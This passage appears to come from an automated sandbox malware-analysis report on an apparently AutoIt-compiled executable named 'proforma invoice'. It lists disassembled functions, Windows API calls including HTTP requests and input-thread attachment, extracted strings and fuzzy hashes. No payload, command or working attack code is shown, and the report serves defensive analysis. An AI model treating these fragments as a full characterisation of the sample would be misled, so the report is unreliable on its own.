                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                  • API String ID: 1256254125-769500911
                  • Opcode ID: 848cf60a9244d687d6ac55120a113323ec4dd3578331237e67791018393c51ef
                  • Instruction ID: 7808186bf861b1d33259ba05e571ae80a088ffc3b4f3219d6822ebf950d668c3
                  • Opcode Fuzzy Hash: 848cf60a9244d687d6ac55120a113323ec4dd3578331237e67791018393c51ef
                  • Instruction Fuzzy Hash: 0641A532A001279ACB205F7DC990DBEBFE5EB65B54B2542A9E421D72C4E736CD81C790
                  Function 00B15393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00B153A0
                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B15416
                  • GetLastError.KERNEL32 ref: 00B15420
                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00B154A7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Error$Mode$DiskFreeLastSpace
                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                  • API String ID: 4194297153-14809454
                  • Opcode ID: 80cef1c4f5e22d4cc427060d6489264125ee65d56c39d30b3f114f59d07f7727
                  • Instruction ID: 6392d5eee1b15aad717b57d33fe3eb11566819b8ebe4d8af1fe80ba6656bc61c
                  • Opcode Fuzzy Hash: 80cef1c4f5e22d4cc427060d6489264125ee65d56c39d30b3f114f59d07f7727
                  • Instruction Fuzzy Hash: 74316B35A00608DFD720DF68C984AEABBF4EB89305F5480A9E4059B396DB75DDC6CB90
                  Function 00B33C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                  Download Yara Rule
                  APIs
                  • CreateMenu.USER32 ref: 00B33C79
                  • SetMenu.USER32(?,00000000), ref: 00B33C88
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B33D10
                  • IsMenu.USER32(?), ref: 00B33D24
                  • CreatePopupMenu.USER32 ref: 00B33D2E
                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B33D5B
                  • DrawMenuBar.USER32 ref: 00B33D63
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                  • String ID: 0$F
                  • API String ID: 161812096-3044882817
                  • Opcode ID: b0e77bdbf1b7e7bad5afe80fb031d12a0c1b2f0570d7dc902ee8a8f10b9afbf1
                  • Instruction ID: 6fe8ad00208ae50ffb35635246b2cb8ffbd97fc364c551bdc76717f5f055fc24
                  • Opcode Fuzzy Hash: b0e77bdbf1b7e7bad5afe80fb031d12a0c1b2f0570d7dc902ee8a8f10b9afbf1
                  • Instruction Fuzzy Hash: 9B415979A01209EFDB14CFA4D884AAA7BF5FF49750F240069F956A7360DB30AA10CF94
                  Function 00B01EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B01F64
                  • GetDlgCtrlID.USER32 ref: 00B01F6F
                  • GetParent.USER32 ref: 00B01F8B
                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B01F8E
                  • GetDlgCtrlID.USER32(?), ref: 00B01F97
                  • GetParent.USER32(?), ref: 00B01FAB
                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B01FAE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 711023334-1403004172
                  • Opcode ID: b8620c51adc422ec5a5df9175439b07793db05969b225e685357aa155bbacad4
                  • Instruction ID: feec0870071a3419704b28d4417ae1ec90dded2d26ed959b436b2d75d163c191
                  • Opcode Fuzzy Hash: b8620c51adc422ec5a5df9175439b07793db05969b225e685357aa155bbacad4
                  • Instruction Fuzzy Hash: A921BE70900214BBCF14AFA4CC859FEBFF8EF1A350F104595F961A72E1CB3859189B60
                  Function 00B33A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B33A9D
                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B33AA0
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B33AC7
                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B33AEA
                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B33B62
                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00B33BAC
                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00B33BC7
                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00B33BE2
                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00B33BF6
                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00B33C13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$LongWindow
                  • String ID:
                  • API String ID: 312131281-0
                  • Opcode ID: 1655ac528b4c1f463bb8d73bc40c5c0a2560b1b4337a20d82b35d892d7d9daf7
                  • Instruction ID: 43550e28db9462a36894656565aa91c1de961f7cbab2e63db251fc4337638358
                  • Opcode Fuzzy Hash: 1655ac528b4c1f463bb8d73bc40c5c0a2560b1b4337a20d82b35d892d7d9daf7
                  • Instruction Fuzzy Hash: 9A616C75900248AFDB10DFA8CC81EEE77F8EB09700F204199FA15A72A1D774AE46DB60
                  Function 00B0B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentThreadId.KERNEL32 ref: 00B0B151
                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B165
                  • GetWindowThreadProcessId.USER32(00000000), ref: 00B0B16C
                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B17B
                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B0B18D
                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1A6
                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1B8
                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B1FD
                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B212
                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B0A1E1,?,00000001), ref: 00B0B21D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                  • String ID:
                  • API String ID: 2156557900-0
                  • Opcode ID: bfd8bddcbf874af3358dc645bee2f06710f075fc4120585ad94ca8696072b662
                  • Instruction ID: f828a6efe0b6224f8d315fdc93c481f9b003578d192e98e80f5bc796a1c6e80f
                  • Opcode Fuzzy Hash: bfd8bddcbf874af3358dc645bee2f06710f075fc4120585ad94ca8696072b662
                  • Instruction Fuzzy Hash: 6331BB75500204BFDB109F64DC99F6D7FE9FB61711F204444FA09E72A0DBB49A808F60
                  Function 00AD2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00AD2C94
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • _free.LIBCMT ref: 00AD2CA0
                  • _free.LIBCMT ref: 00AD2CAB
                  • _free.LIBCMT ref: 00AD2CB6
                  • _free.LIBCMT ref: 00AD2CC1
                  • _free.LIBCMT ref: 00AD2CCC
                  • _free.LIBCMT ref: 00AD2CD7
                  • _free.LIBCMT ref: 00AD2CE2
                  • _free.LIBCMT ref: 00AD2CED
                  • _free.LIBCMT ref: 00AD2CFB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: fc1f23af8225f1cb4c6a8582a12060def63c37c818515792999fd4dd6b364103
                  • Instruction ID: 93f821a3d387b2fed8cd12f8de1afcb0d2c68ec430a16f332394738d3f068037
                  • Opcode Fuzzy Hash: fc1f23af8225f1cb4c6a8582a12060def63c37c818515792999fd4dd6b364103
                  • Instruction Fuzzy Hash: B311A476500108AFCB02EF54DA92EDD3BA5FF55350F4144A6FA4A9F322DA31EE50EB90
                  Function 00AA1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                  Download Yara Rule
                  APIs
                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AA1459
                  • OleUninitialize.OLE32(?,00000000), ref: 00AA14F8
                  • UnregisterHotKey.USER32(?), ref: 00AA16DD
                  • DestroyWindow.USER32(?), ref: 00AE24B9
                  • FreeLibrary.KERNEL32(?), ref: 00AE251E
                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AE254B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                  • String ID: close all
                  • API String ID: 469580280-3243417748
                  • Opcode ID: 0993d8c4e7cb4c1783ec6e396e3dabbd373861cf7c6b82b719a3b411f74e5250
                  • Instruction ID: 5eaeedd0336d3ca2c26e45156f75d4377fb5a087b4768604f0b43b38e8bb9ac2
                  • Opcode Fuzzy Hash: 0993d8c4e7cb4c1783ec6e396e3dabbd373861cf7c6b82b719a3b411f74e5250
                  • Instruction Fuzzy Hash: 65D1A031701212DFDB19EF55CA95B69F7A8BF06700F2542ADE44AAB292DB30ED12CF50
                  Function 00B17DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B17FAD
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B17FC1
                  • GetFileAttributesW.KERNEL32(?), ref: 00B17FEB
                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B18005
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18017
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18060
                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B180B0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CurrentDirectory$AttributesFile
                  • String ID: *.*
                  • API String ID: 769691225-438819550
                  • Opcode ID: 7e52421ff8b9914ce4fab4880e57e7cbc19a4358445ccb82a0a8317a9d49579b
                  • Instruction ID: 8e4486b25b937188d30b5711701bae2e1aa679db66f5d046c74c4731e09fd2f9
                  • Opcode Fuzzy Hash: 7e52421ff8b9914ce4fab4880e57e7cbc19a4358445ccb82a0a8317a9d49579b
                  • Instruction Fuzzy Hash: FC8191725482459BCB20EF54C8849EEB7E8FF89310F9448AEF885D7250DF35DD858B92
                  Function 00AA5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                  Download Yara Rule
                  APIs
                  • SetWindowLongW.USER32(?,000000EB), ref: 00AA5C7A
                    • Part of subcall function 00AA5D0A: GetClientRect.USER32(?,?), ref: 00AA5D30
                    • Part of subcall function 00AA5D0A: GetWindowRect.USER32(?,?), ref: 00AA5D71
                    • Part of subcall function 00AA5D0A: ScreenToClient.USER32(?,?), ref: 00AA5D99
                  • GetDC.USER32 ref: 00AE46F5
                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00AE4708
                  • SelectObject.GDI32(00000000,00000000), ref: 00AE4716
                  • SelectObject.GDI32(00000000,00000000), ref: 00AE472B
                  • ReleaseDC.USER32(?,00000000), ref: 00AE4733
                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00AE47C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                  • String ID: U
                  • API String ID: 4009187628-3372436214
                  • Opcode ID: c8b25a79d1fbb73b852a0011ce745f2a953a636b4e6ef678208368ee458808d5
                  • Instruction ID: 89d5d0fbada04375cd68a8fc7fe77692dd1687571eca60d8b70602d4d8073464
                  • Opcode Fuzzy Hash: c8b25a79d1fbb73b852a0011ce745f2a953a636b4e6ef678208368ee458808d5
                  • Instruction Fuzzy Hash: 1B71F330800245DFCF218F69C984ABA7BB9FF4E360F244269ED555B1AAC7318C81DFA0
                  Function 00B1359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                  Download Yara Rule
                  APIs
                  • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00B135E4
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • LoadStringW.USER32(00B72390,?,00000FFF,?), ref: 00B1360A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LoadString$_wcslen
                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                  • API String ID: 4099089115-2391861430
                  • Opcode ID: 52d1df82a5b01fd495d1b6e483bc4cfb911d28b725599e7018b17ff085e01592
                  • Instruction ID: f26487777b1d8bdf11e09a851b55d9fd3c5a3f5355255d67c10a6794628414e5
                  • Opcode Fuzzy Hash: 52d1df82a5b01fd495d1b6e483bc4cfb911d28b725599e7018b17ff085e01592
                  • Instruction Fuzzy Hash: BB515C72800219BADF15EBA0CD42EEEBBB8EF15740F5441A5F105731E2EB311A99DFA1
                  Function 00B1C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                  Download Yara Rule
                  APIs
                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1C272
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B1C29A
                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B1C2CA
                  • GetLastError.KERNEL32 ref: 00B1C322
                  • SetEvent.KERNEL32(?), ref: 00B1C336
                  • InternetCloseHandle.WININET(00000000), ref: 00B1C341
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                  • String ID:
                  • API String ID: 3113390036-3916222277
                  • Opcode ID: cbf778069a762725faf658f4a544b648c881a889e92dafbed7f2cd3bba2ccd67
                  • Instruction ID: 8271e2d11ca4e858e3f9677198af3a5510d3cc52218806498244ae4f6589daf9
                  • Opcode Fuzzy Hash: cbf778069a762725faf658f4a544b648c881a889e92dafbed7f2cd3bba2ccd67
                  • Instruction Fuzzy Hash: EE317FB1540204AFD7219FA59C88AEF7FFCEB49744B50855DF456E3200DB30DD849B65
                  Function 00B0989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AE3AAF,?,?,Bad directive syntax error,00B3CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00B098BC
                  • LoadStringW.USER32(00000000,?,00AE3AAF,?), ref: 00B098C3
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B09987
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HandleLoadMessageModuleString_wcslen
                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                  • API String ID: 858772685-4153970271
                  • Opcode ID: b038935bb5f77bfad3bc5257b4ce12b44b79c92bf7a02db4ed78a028d4005310
                  • Instruction ID: 1c968eb40666d058885000ce93ef3a7ea129c8083ef5a64f8b69b58a4f325e8f
                  • Opcode Fuzzy Hash: b038935bb5f77bfad3bc5257b4ce12b44b79c92bf7a02db4ed78a028d4005310
                  • Instruction Fuzzy Hash: E921603280021AAFCF16AF90CD06EEE7BB9FF19700F044495F515660E2EF759A18DB61
                  Function 00B0209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32 ref: 00B020AB
                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00B020C0
                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B0214D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassMessageNameParentSend
                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                  • API String ID: 1290815626-3381328864
                  • Opcode ID: 1d0c2778dd22c003b004193c32c08d0f5fa787481da9d918537f4b7230a065b1
                  • Instruction ID: 29d072581c973372328c6f2fc84c4f58d75490a84719efb22cdb2cf338e03dc9
                  • Opcode Fuzzy Hash: 1d0c2778dd22c003b004193c32c08d0f5fa787481da9d918537f4b7230a065b1
                  • Instruction Fuzzy Hash: CA112976688706B9FA252720DC0FDEA7BDCCF09364F21019AFB04B60E1FE65685A5618
                  Function 00ADCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                  • String ID:
                  • API String ID: 1282221369-0
                  • Opcode ID: f0efd0585dd81c94fc82b4bf809f11354b23b26d0771fa24bcf6820775874633
                  • Instruction ID: c1044a71d68c50fcbd8b425dfc202f34a0888417eaabe110925f0339e5881e3b
                  • Opcode Fuzzy Hash: f0efd0585dd81c94fc82b4bf809f11354b23b26d0771fa24bcf6820775874633
                  • Instruction Fuzzy Hash: 2F6147B1904302AFDB21AFB8D985BAD7BA5EF09320F44416FF947A7381EA319D41D790
